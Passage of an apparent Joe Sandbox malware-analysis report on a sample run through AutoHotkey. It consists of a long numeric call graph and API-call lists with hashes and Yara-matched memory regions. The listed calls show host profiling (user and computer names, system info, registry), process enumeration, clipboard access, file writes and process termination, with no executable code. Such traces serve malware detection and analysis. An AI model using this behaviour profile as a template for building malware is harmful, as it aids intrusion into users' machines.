104453 4845233 104450->104453 104451->104453 104452->104446 104453->104118 104456 4875e49 104455->104456 104457 4875e82 104456->104457 104460 4875e7a GetFileAttributesA 104456->104460 104458 4844f29 11 API calls 104457->104458 104459 4875ea1 104458->104459 104459->104132 104460->104457 104462 485bd05 104461->104462 104463 485bcf2 104461->104463 104465 4875e39 12 API calls 104462->104465 104982 4874295 104463->104982 104467 485bd21 104465->104467 104466 485bcfa 104468 4848b09 11 API calls 104466->104468 104469 485bd33 104467->104469 104470 4875e39 12 API calls 104467->104470 104468->104462 104471 4844f7d 11 API calls 104469->104471 104472 485bd2f 104470->104472 104521 485bd3f 104471->104521 104472->104469 104473 485bd4b 104472->104473 104475 4875e39 12 API calls 104473->104475 104474 4844f4d 11 API calls 104477 485c1ef 104474->104477 104476 485bd55 104475->104476 104478 485bd71 104476->104478 104479 485bd59 104476->104479 104597 4870f91 104477->104597 104481 4875e39 12 API calls 104478->104481 104480 4844f7d 11 API calls 104479->104480 104480->104521 104482 485bd7b 104481->104482 104483 485bd8d 104482->104483 104484 4875e39 12 API calls 104482->104484 104485 4844f7d 11 API calls 104483->104485 104486 485bd89 104484->104486 104485->104521 104486->104483 104487 485bda5 104486->104487 104488 4875e39 12 API calls 104487->104488 104489 485bdaf 104488->104489 104490 485bdc1 104489->104490 104491 4875e39 12 API calls 104489->104491 104492 4844f7d 11 API calls 104490->104492 104493 485bdbd 104491->104493 104492->104521 104493->104490 104494 485bdd9 104493->104494 104495 4875e39 12 API calls 104494->104495 104496 485bde3 104495->104496 104497 485bdf5 104496->104497 104498 4875e39 12 API calls 104496->104498 104499 4844f7d 11 API calls 104497->104499 104500 485bdf1 104498->104500 104499->104521 104500->104497 104501 485be0d 104500->104501 104502 485be2f 104501->104502 104503 4875e39 12 API calls 104501->104503 104504 4844f7d 11 API calls 104502->104504 104505 485be2b 
104503->104505 104504->104521 104505->104502 104506 485be47 104505->104506 104507 4875e39 12 API calls 104506->104507 104508 485be51 104507->104508 104509 485be55 104508->104509 104510 485be66 104508->104510 104511 4844f7d 11 API calls 104509->104511 104512 485be92 104510->104512 104513 485be7a 104510->104513 104511->104521 104515 485bea6 104512->104515 104516 485bebe 104512->104516 104514 4844f7d 11 API calls 104513->104514 104514->104521 104517 4844f7d 11 API calls 104515->104517 104518 485bed2 104516->104518 104519 485beea 104516->104519 104517->104521 104520 4844f7d 11 API calls 104518->104520 104522 485bf16 104519->104522 104523 485befe 104519->104523 104520->104521 104521->104474 104525 485bf3b 104522->104525 104526 485bf2a 104522->104526 104524 4844f7d 11 API calls 104523->104524 104524->104521 104528 485bf60 104525->104528 104529 485bf4f 104525->104529 104527 4844f7d 11 API calls 104526->104527 104527->104521 104531 485bf85 104528->104531 104532 485bf74 104528->104532 104530 4844f7d 11 API calls 104529->104530 104530->104521 104534 485bf99 104531->104534 104535 485bfaa 104531->104535 104533 4844f7d 11 API calls 104532->104533 104533->104521 104536 4844f7d 11 API calls 104534->104536 104537 485bfcf 104535->104537 104538 485bfbe 104535->104538 104536->104521 104540 485bfe3 104537->104540 104541 485bffb 104537->104541 104539 4844f7d 11 API calls 104538->104539 104539->104521 104542 4844f7d 11 API calls 104540->104542 104543 485c020 104541->104543 104544 485c00f 104541->104544 104542->104521 104546 485c045 104543->104546 104547 485c034 104543->104547 104545 4844f7d 11 API calls 104544->104545 104545->104521 104549 485c059 104546->104549 104550 485c06a 104546->104550 104548 4844f7d 11 API calls 104547->104548 104548->104521 104551 4844f7d 11 API calls 104549->104551 104552 485c08f 104550->104552 104553 485c07e 104550->104553 104551->104521 104555 485c0b4 104552->104555 104556 485c0a3 104552->104556 104554 4844f7d 11 API calls 104553->104554 104554->104521 104558 
4875e39 12 API calls 104555->104558 104557 4844f7d 11 API calls 104556->104557 104557->104521 104559 485c0be 104558->104559 104560 485c0d3 104559->104560 104561 485c0c2 104559->104561 104563 485c0e7 104560->104563 104564 485c0ff 104560->104564 104562 4844f7d 11 API calls 104561->104562 104562->104521 104565 4844f7d 11 API calls 104563->104565 104566 4875e39 12 API calls 104564->104566 104565->104521 104567 485c109 104566->104567 104568 485c125 104567->104568 104569 485c10d 104567->104569 104571 4875e39 12 API calls 104568->104571 104570 4844f7d 11 API calls 104569->104570 104570->104521 104572 485c12f 104571->104572 104573 485c144 104572->104573 104574 485c133 104572->104574 104575 4875e39 12 API calls 104573->104575 104576 4844f7d 11 API calls 104574->104576 104577 485c14e 104575->104577 104576->104521 104578 485c167 104577->104578 104579 485c152 104577->104579 104581 4875e39 12 API calls 104578->104581 104580 4844f7d 11 API calls 104579->104580 104580->104521 104582 485c171 104581->104582 104583 485c175 104582->104583 104584 485c183 104582->104584 104585 4844f7d 11 API calls 104583->104585 104586 4875e39 12 API calls 104584->104586 104585->104521 104587 485c18d 104586->104587 104588 485c1a6 104587->104588 104589 485c191 104587->104589 104591 4875e39 12 API calls 104588->104591 104590 4844f7d 11 API calls 104589->104590 104590->104521 104592 485c1b0 104591->104592 104593 485c1b4 104592->104593 104594 485c1c2 104592->104594 104595 4844f7d 11 API calls 104593->104595 104596 4844f7d 11 API calls 104594->104596 104595->104521 104596->104521 104598 4870f99 104597->104598 104599 4875195 11 API calls 104598->104599 104600 487100d 104599->104600 104601 4844f7d 11 API calls 104600->104601 104602 487101a 104601->104602 104603 4871045 104602->104603 104604 4871024 104602->104604 104606 484d49d 11 API calls 104603->104606 104605 484d49d 11 API calls 104604->104605 104607 4871031 104605->104607 104606->104607 104608 4875195 11 API calls 104607->104608 104609 4871071 
104608->104609 105010 484d49d 104609->105010 104611 487107c 104612 4875195 11 API calls 104611->104612 104613 487109c 104612->104613 104614 4845019 11 API calls 104613->104614 104615 48710d3 104614->104615 104616 4844fc1 11 API calls 104615->104616 104617 48710de 104616->104617 105015 4873f0d 104617->105015 104619 48710ee 104620 4844fc1 11 API calls 104619->104620 104621 48710f9 104620->104621 104622 4845465 11 API calls 104621->104622 104623 487110f 104622->104623 104624 4871150 104623->104624 104625 487111e 104623->104625 104627 4875a5d 12 API calls 104624->104627 105075 4874a1d 12 API calls 104625->105075 104628 487115a 104627->104628 104630 487122d 104628->104630 105076 4870e09 17 API calls 104628->105076 104629 487112b 104631 48576c9 16 API calls 104629->104631 104633 4856e99 11 API calls 104630->104633 104688 4871141 104631->104688 104635 487124c 104633->104635 104634 4875e39 12 API calls 104636 48712ec 104634->104636 105027 487453d 104635->105027 104637 48712fa 104636->104637 105069 4875935 104636->105069 104640 4875e39 12 API calls 104637->104640 104642 4871304 104640->104642 104641 487116f 105077 486f521 11 API calls 104641->105077 104645 4871312 104642->104645 104648 4875935 12 API calls 104642->104648 104643 4871285 105031 484919d 104643->105031 104649 4871326 104645->104649 104650 487131c 104645->104650 104646 4871194 104646->104630 104656 4856e99 11 API calls 104646->104656 104648->104645 104655 4844f4d 11 API calls 104649->104655 105080 48727ad GetFileAttributesA SetFileAttributesA 104650->105080 104652 4856e99 11 API calls 104657 48712a8 104652->104657 104653 4871254 104653->104643 105078 4874a1d 12 API calls 104653->105078 104658 4871340 104655->104658 104659 48711ae 104656->104659 105035 48576c9 104657->105035 104689 4894aa9 104658->104689 104662 487453d 11 API calls 104659->104662 104665 48711b6 104662->104665 104663 48712b5 105046 484aac5 GetLocalTime 104663->105046 104664 4871280 105079 487522d Sleep TerminateProcess 104664->105079 
104665->104630 104668 48711ba 104665->104668 104669 484919d 42 API calls 104668->104669 104671 48711c2 104669->104671 104670 48712ba 104674 484914d 11 API calls 104670->104674 104672 4856e99 11 API calls 104671->104672 104673 48711dd 104672->104673 104675 48576c9 16 API calls 104673->104675 104676 48712d0 104674->104676 104677 48711ea 104675->104677 104678 4844f7d 11 API calls 104676->104678 104679 4856e99 11 API calls 104677->104679 104680 48712dd 104678->104680 104681 48711fc 104679->104681 105051 4870e75 104680->105051 104683 48576c9 16 API calls 104681->104683 104684 4871209 104683->104684 104685 4856e99 11 API calls 104684->104685 104686 487121b 104685->104686 104687 4844f7d 11 API calls 104686->104687 104687->104688 104688->104634 104690 4856e99 11 API calls 104689->104690 104691 4894ada 104690->104691 105156 4870d31 11 API calls 104691->105156 104693 4894aeb 104696 4856e99 11 API calls 104693->104696 104694 4894ae2 104694->104693 105157 48948b1 17 API calls 104694->105157 104697 4894afa 104696->104697 105158 4870d31 11 API calls 104697->105158 104699 4894b02 104700 4894b1d 104699->104700 104701 4856e99 11 API calls 104699->104701 104706 4894b2f 104700->104706 105160 489496d 11 API calls 104700->105160 104703 4894b15 104701->104703 105159 4870d31 11 API calls 104703->105159 104704 4894b26 104704->104706 105161 487522d Sleep TerminateProcess 104704->105161 104708 4856e99 11 API calls 104706->104708 104709 4894b3e 104708->104709 105162 4870d31 11 API calls 104709->105162 104711 4894b46 104712 4894b71 104711->104712 104713 4856e99 11 API calls 104711->104713 104714 4856e99 11 API calls 104712->104714 104715 4894b59 104713->104715 104716 4894b80 104714->104716 104717 484919d 42 API calls 104715->104717 105164 4870d31 11 API calls 104716->105164 104723 4894b61 104717->104723 104719 4894b88 104720 4894bc5 104719->104720 104722 4856e99 11 API calls 104719->104722 104721 4844f4d 11 API calls 104720->104721 104724 4894bdf 104721->104724 104725 4894b9b 104722->104725 
104723->104712 105163 487522d Sleep TerminateProcess 104723->105163 104755 4856e99 104724->104755 104726 484919d 42 API calls 104725->104726 104728 4894ba3 104726->104728 104728->104720 105165 487522d Sleep TerminateProcess 104728->105165 104733 4874646 104730->104733 104731 4874687 104732 4844f4d 11 API calls 104731->104732 104734 48746a1 104732->104734 104733->104731 104735 484545d 11 API calls 104733->104735 104739 487522d Sleep TerminateProcess 104734->104739 104736 4874673 104735->104736 105166 487459d 104736->105166 104739->104109 104740->104139 104742 4874748 104741->104742 105173 4843991 QueryPerformanceCounter 104742->105173 104744 4874752 104745 4844fc1 11 API calls 104744->104745 104746 487475f 104745->104746 104747 4844f29 11 API calls 104746->104747 104749 4874766 104747->104749 104748 4845111 11 API calls 104748->104749 104749->104748 104750 484520d 11 API calls 104749->104750 104751 4874796 104749->104751 104750->104749 104752 4844f4d 11 API calls 104751->104752 104753 48747b0 104752->104753 104753->104145 104754->104127 104756 4856ec6 104755->104756 104757 4856efa 104756->104757 104762 4856ecc 104756->104762 104758 4856ef8 104757->104758 104759 4844f29 11 API calls 104757->104759 104760 4844f29 11 API calls 104758->104760 104759->104758 104761 4856f17 104760->104761 104764 4870d31 11 API calls 104761->104764 104763 4845465 11 API calls 104762->104763 104763->104758 104764->104149 104765->104161 104766->104176 104768 48575c3 104767->104768 104769 48575ff 104768->104769 104772 4845111 11 API calls 104768->104772 104770 4844f4d 11 API calls 104769->104770 104771 4857634 104770->104771 104771->104169 104773 48575ec 104772->104773 104774 48452c5 11 API calls 104773->104774 104774->104769 105176 4847a51 104775->105176 104777 4872044 GetUserNameA 104778 4872067 104777->104778 104779 487205a 104777->104779 104780 4844f29 11 API calls 104778->104780 104781 4845535 11 API calls 104779->104781 104782 4872065 104780->104782 104781->104782 104782->104180 104784 
4848b1a 104783->104784 104785 4845535 11 API calls 104784->104785 104786 4848b25 104785->104786 104786->104188 104787->104171 104788->104184 104789->104190 104790->104203 104791->104207 104792->104213 104793->104219 104794->104226 104795->104241 104796->104260 104797->104209 104798->104220 104799->104240 104800->104235 104801->104250 104802->104261 104803->104278 104804->104286 104805->104275 104806->104283 104807->104201 104808->104208 104809->104231 104810->104222 104811->104227 104812->104247 104813->104259 104814->104291 104815->104296 104816->104298 104817->104302 104818->104304 104819->104308 104820->104310 104821->104248 104822->104272 104823->104262 104824->104274 104825->104282 104826->104288 104830 4844f53 104828->104830 104829 4844f79 104829->104088 104830->104829 105178 4843585 11 API calls 104830->105178 104833 4845015 104832->104833 104834 4844ff1 104832->104834 104833->104335 104838 4843555 11 API calls 104834->104838 104836 4844ffe 104836->104335 104837->104337 104838->104836 104877 4875071 104839->104877 104841 4871e59 104842 4871ebd 104841->104842 104843 4875071 14 API calls 104842->104843 104844 4871ee8 104843->104844 104845 4871eed 104844->104845 104846 4871ef8 104844->104846 104895 4874bc1 11 API calls 104845->104895 104848 4844f7d 11 API calls 104846->104848 104849 4871ef6 104848->104849 104890 4871ea9 GetSystemInfo 104849->104890 104851 4871f10 104891 484914d 104851->104891 104854 48452c5 11 API calls 104855 4871f30 104854->104855 104856 4844f29 11 API calls 104855->104856 104857 4871f45 104856->104857 104858 4872089 104857->104858 104901 4843c09 104858->104901 104861 48720cc 104906 4874e31 13 API calls 104861->104906 104862 48720e8 104863 4844f29 11 API calls 104862->104863 104866 48720e6 104863->104866 104903 48455c9 104866->104903 104868 48452c5 104869 48452d6 104868->104869 104870 4845313 104869->104870 104871 48452fc 104869->104871 104872 4844fed 11 API calls 104870->104872 104907 4845535 104871->104907 104874 4845309 104872->104874 
104875 4845344 104874->104875 104876 4844f7d 11 API calls 104874->104876 104876->104875 104885 4844f29 104877->104885 104879 487508e 104880 48750b5 RegOpenKeyExA 104879->104880 104881 48750c0 104880->104881 104882 48750ff RegCloseKey 104880->104882 104883 48750d9 RegQueryValueExA 104881->104883 104882->104841 104883->104882 104884 48750e7 104883->104884 104884->104882 104886 4844f2f 104885->104886 104887 4844f4a 104885->104887 104886->104887 104889 4843585 11 API calls 104886->104889 104887->104879 104889->104887 104890->104851 104892 4849163 104891->104892 104896 4845019 104892->104896 104895->104849 104897 4844fed 11 API calls 104896->104897 104898 4845029 104897->104898 104899 4844f29 11 API calls 104898->104899 104900 4845041 104899->104900 104900->104854 104902 4843c1d GetComputerNameW 104901->104902 104902->104861 104902->104862 104904 48455dd 104903->104904 104905 48455cf SysFreeString 104903->104905 104904->104868 104905->104904 104906->104866 104908 4845542 104907->104908 104912 4845572 104907->104912 104910 4844fed 11 API calls 104908->104910 104911 484554e 104908->104911 104909 4844f29 11 API calls 104909->104911 104910->104912 104911->104874 104912->104909 104914 4875a21 104913->104914 104919 48759c9 104914->104919 104917 4844f29 11 API calls 104918 4875a4e 104917->104918 104918->104425 104923 4845405 104919->104923 104922 48759de 104922->104917 104924 4845409 GetFileAttributesA 104923->104924 104924->104922 104926 485a8c5 104925->104926 104951 485a735 104926->104951 104929 485b811 104930 485b832 104929->104930 104963 485b79d 104930->104963 104935 4844f29 11 API calls 104938 485b85d 104935->104938 104936 4845111 11 API calls 104936->104938 104937 48452c5 11 API calls 104937->104938 104938->104936 104938->104937 104939 485b8c4 104938->104939 104940 4844f4d 11 API calls 104939->104940 104941 485b8de 104940->104941 104942 4844f29 11 API calls 104941->104942 104943 485b8e6 104942->104943 104944 4845465 104943->104944 104945 4845497 104944->104945 104947 
484546a 104944->104947 104946 4844f29 11 API calls 104945->104946 104948 484548d 104946->104948 104947->104945 104949 484547e 104947->104949 104948->104437 104950 4845019 11 API calls 104949->104950 104950->104948 104952 485a75d 104951->104952 104953 4844f29 11 API calls 104952->104953 104955 485a867 104953->104955 104956 484520d 11 API calls 104955->104956 104957 485a88b 104955->104957 104960 4845111 104955->104960 104956->104955 104958 4844f29 11 API calls 104957->104958 104959 485a8a0 104958->104959 104959->104929 104961 4845019 11 API calls 104960->104961 104962 484511e 104961->104962 104962->104955 104964 485b7b1 104963->104964 104971 485b621 104964->104971 104967 4844fc1 104969 4844fc5 104967->104969 104968 4844fe9 104968->104935 104969->104968 104980 4843585 11 API calls 104969->104980 104973 485b649 104971->104973 104972 4844f29 11 API calls 104975 485b753 104972->104975 104973->104972 104973->104973 104974 4845111 11 API calls 104974->104975 104975->104974 104976 484520d 11 API calls 104975->104976 104977 485b777 104975->104977 104976->104975 104978 4844f29 11 API calls 104977->104978 104979 485b78c 104978->104979 104979->104967 104980->104968 104981->104449 104991 485bba9 104982->104991 104984 48742c9 104996 485bbc9 104984->104996 104986 4874349 CloseHandle 104986->104466 104989 4874300 104989->104986 104990 48452c5 11 API calls 104989->104990 105001 485bbe9 104989->105001 104990->104989 105006 485b92d 104991->105006 104994 485bbc3 104994->104984 104995 485bbb8 CreateToolhelp32Snapshot 104995->104984 104997 485b92d 17 API calls 104996->104997 104998 485bbd4 104997->104998 104999 485bbe3 104998->104999 105000 485bbd8 Process32First 104998->105000 104999->104989 105000->104989 105002 485b92d 17 API calls 105001->105002 105003 485bbf4 105002->105003 105004 485bc03 105003->105004 105005 485bbf8 Process32Next 105003->105005 105004->104989 105005->104989 105007 485ba71 105006->105007 105008 485b93c GetModuleHandleA 105006->105008 105007->104994 105007->104995 
105008->105007 105009 485b951 16 API calls 105008->105009 105009->105007 105011 4844f7d 11 API calls 105010->105011 105012 484d4ac 105011->105012 105013 484d4cc 105012->105013 105014 484520d 11 API calls 105012->105014 105013->104611 105014->105013 105016 4873f37 105015->105016 105081 4846409 105016->105081 105018 4873f4b 105019 4846409 11 API calls 105018->105019 105020 4873f81 105019->105020 105084 4873ebd 105020->105084 105022 4873fa7 105023 4845535 11 API calls 105022->105023 105026 4873fb8 105023->105026 105024 487400f 105024->104619 105026->105024 105088 484545d 105026->105088 105028 487454f 105027->105028 105029 4844f29 11 API calls 105028->105029 105030 487458d 105029->105030 105030->104653 105032 48491ad 105031->105032 105033 48491ce 105032->105033 105111 4848a75 42 API calls 105032->105111 105033->104652 105036 48576f4 105035->105036 105037 4857715 CharNextA 105036->105037 105045 4857728 105036->105045 105037->105036 105038 48577f0 105038->104663 105039 4845019 11 API calls 105039->105045 105041 4857758 CharNextA 105041->105045 105042 4857794 CharNextA 105042->105045 105043 48577b5 CharNextA 105044 48577d2 CharNextA 105043->105044 105043->105045 105044->105044 105044->105045 105045->105038 105045->105039 105045->105041 105045->105042 105045->105043 105045->105044 105112 4848f01 11 API calls 105045->105112 105113 484a8fd 105046->105113 105052 4870e9a 105051->105052 105123 4856b1d 105052->105123 105055 4857599 11 API calls 105056 4870eb8 105055->105056 105057 4856b1d 12 API calls 105056->105057 105058 4870ec5 105057->105058 105059 4857599 11 API calls 105058->105059 105060 4870ed4 105059->105060 105061 4857599 11 API calls 105060->105061 105062 4870ee6 105061->105062 105063 484520d 11 API calls 105062->105063 105064 4870f0a 105063->105064 105141 4870d95 105064->105141 105066 4870f2b 105067 4844f4d 11 API calls 105066->105067 105068 4870f4c 105067->105068 105068->104688 105070 4875945 105069->105070 105151 48758bd 105070->105151 105073 4844f29 11 API calls 
105074 4875972 105073->105074 105074->104637 105075->104629 105076->104641 105077->104646 105078->104664 105079->104643 105080->104649 105094 484625d 105081->105094 105085 4873ed0 105084->105085 105086 4846409 11 API calls 105085->105086 105087 4873ee6 105086->105087 105087->105022 105089 4845411 105088->105089 105090 4844fed 11 API calls 105089->105090 105091 484544c 105089->105091 105092 4845428 105090->105092 105091->105026 105092->105091 105110 4843585 11 API calls 105092->105110 105095 4846280 105094->105095 105099 484629b 105094->105099 105096 484628b 105095->105096 105106 484365d 11 API calls 105095->105106 105107 4846255 11 API calls 105096->105107 105101 48462eb 105099->105101 105108 484365d 11 API calls 105099->105108 105100 4846296 105100->105018 105104 48462fd 105101->105104 105109 4843555 11 API calls 105101->105109 105104->105100 105105 484625d 11 API calls 105104->105105 105105->105104 105106->105096 105107->105100 105108->105101 105109->105104 105110->105091 105111->105033 105112->105045 105114 484a915 105113->105114 105115 484a923 105114->105115 105121 4848a5d 42 API calls 105114->105121 105117 484a755 105115->105117 105118 484a778 105117->105118 105119 484a786 105118->105119 105122 4848a5d 42 API calls 105118->105122 105119->104670 105121->105115 105122->105119 105124 4856b4d 105123->105124 105125 4844f29 11 API calls 105124->105125 105131 4856b68 105124->105131 105127 4856bba 105125->105127 105126 4856ca2 105126->105131 105150 48454a5 11 API calls 105126->105150 105127->105126 105136 4856beb CharNextA 105127->105136 105138 4845111 11 API calls 105127->105138 105139 4844fc1 11 API calls 105127->105139 105140 48452c5 11 API calls 105127->105140 105149 4848db5 11 API calls 105127->105149 105129 4844f4d 11 API calls 105130 4856cd1 105129->105130 105132 4844f29 11 API calls 105130->105132 105131->105129 105133 4856cd9 105132->105133 105134 4844f29 11 API calls 105133->105134 105135 4856ce1 105134->105135 105135->105055 105136->105127 105138->105127 
105139->105127 105140->105127 105142 4870dae 105141->105142 105143 4873f0d 11 API calls 105142->105143 105144 4870dd7 105143->105144 105145 4874631 15 API calls 105144->105145 105146 4870de2 105145->105146 105147 4844f4d 11 API calls 105146->105147 105148 4870dfc 105147->105148 105148->105066 105149->105127 105150->105131 105152 48758cd 105151->105152 105153 48758f8 CreateDirectoryA 105152->105153 105154 4844f29 11 API calls 105153->105154 105155 4875912 105154->105155 105155->105073 105156->104694 105157->104693 105158->104699 105159->104700 105160->104704 105161->104706 105162->104711 105163->104712 105164->104719 105165->104720 105167 48745b6 105166->105167 105168 487460b 105167->105168 105171 48745e1 CreateFileA 105167->105171 105169 4844f29 11 API calls 105168->105169 105170 4874620 Sleep 105169->105170 105170->104731 105171->105168 105172 48745ee WriteFile CloseHandle 105171->105172 105172->105168 105174 484399e 105173->105174 105175 48439a9 GetTickCount 105173->105175 105174->104744 105175->104744 105177 4847a58 105176->105177 105177->104777 105178->104830 105180 4844be4 105179->105180 105181 4844bae 105179->105181 105180->104088 105181->105180 105184 4894031 105181->105184 105198 48464a1 105181->105198 105185 489404f 105184->105185 105186 489409e 105184->105186 105202 48822dd GetDC GetDeviceCaps GetDeviceCaps 105185->105202 105187 4844f4d 11 API calls 105186->105187 105189 48940b8 105187->105189 105189->105181 105190 4894054 105205 4847031 105190->105205 105192 4894067 105211 487cacd 105192->105211 105195 4847031 42 API calls 105196 489408c 105195->105196 105197 487cacd 43 API calls 105196->105197 105197->105186 105199 48464b1 GetModuleFileNameA 105198->105199 105200 48464cd 105198->105200 105259 4846735 GetModuleFileNameA RegOpenKeyExA 105199->105259 105200->105181 105203 4882302 ReleaseDC 105202->105203 105203->105190 105206 4847042 105205->105206 105210 4847073 105205->105210 105206->105210 105216 48464e9 30 API calls 105206->105216 105208 4847062 
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040150F
                                      • CloseClipboard.USER32 ref: 0040151B
                                      • SetTimer.USER32(0002044A,00000009,0000000A), ref: 004015C4
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetFocus.USER32 ref: 004016D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseFocusGlobalMessageTimerUnlock
                                      • String ID: #32770$6Dd$8&
                                      • API String ID: 2919891889-3320845119
                                      • Opcode ID: d66acf2f5b038708fbdfcca2c87ba31abefd78b60b051c17a0b86c35794dbe50
                                      • Instruction ID: c40d62707e414facf4d416d366af1b78ea6665447dcfaa81340ce19929726241
                                      • Opcode Fuzzy Hash: d66acf2f5b038708fbdfcca2c87ba31abefd78b60b051c17a0b86c35794dbe50
                                      • Instruction Fuzzy Hash: BC929F709083419BDB24DF24C98876B77E1AB85304F18457FE985AB3E1D7B8EC41CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04846750
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484676E
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484678C
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 048467AA
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 048467F3
                                      • RegQueryValueExA.ADVAPI32(?,048469B5,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001), ref: 04846811
                                      • RegCloseKey.ADVAPI32(?,04846840,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04846833
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04846850
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0484685D
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04846863
                                      • lstrlen.KERNEL32(00000000), ref: 0484688E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 048468E3
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 048468F3
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0484691F
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0484692F
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846959
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846969
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                      • API String ID: 1759228003-2375825460
                                      • Opcode ID: bbd6538e6d1c43fe6041bcfa3e9533f272581454ed2a7b0a309baf20fadfc721
                                      • Instruction ID: cced0f7f03277c3bc0bde36223db55b550a74456c66866b81b93b4dcafafca48
                                      • Opcode Fuzzy Hash: bbd6538e6d1c43fe6041bcfa3e9533f272581454ed2a7b0a309baf20fadfc721
                                      • Instruction Fuzzy Hash: FF6165B1E0020DBEFB11DAE8CC49FEFB7BC9B89704F404651A545F6181E7F8AA848B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetForegroundWindow.USER32 ref: 00401D9A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401DAD
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 00401DCA
                                      • IsDialogMessageW.USER32(00000000,?), ref: 0040316C
                                      • SetCurrentDirectoryW.KERNEL32(004B0CF8), ref: 00403194
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountMessageTickWindow$ClassCurrentDialogDirectoryForegroundNameProcessThread
                                      • String ID: #32770$6Dd$8&
                                      • API String ID: 3752270653-3320845119
                                      • Opcode ID: c339f24e7893fe42b00ed86886aa114e0e565fd1beb847350322579138385d39
                                      • Instruction ID: 3cc67100834623ee9eae678e2b4d6fd3e59ff814be5be24b81a93013b3d4dfe5
                                      • Opcode Fuzzy Hash: c339f24e7893fe42b00ed86886aa114e0e565fd1beb847350322579138385d39
                                      • Instruction Fuzzy Hash: CB12A3719043429BDB258F28C98476BB7E5BB85304F19457FE845AB3E0D778DC42CB8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,?,00000000,FFFFFF61,00000000,00000000,00000000), ref: 00481ED9
                                      • EnumResourceNamesW.KERNEL32 ref: 00481F26
                                      • FindResourceW.KERNEL32(00400000,00400000,0000000E), ref: 00481F3F
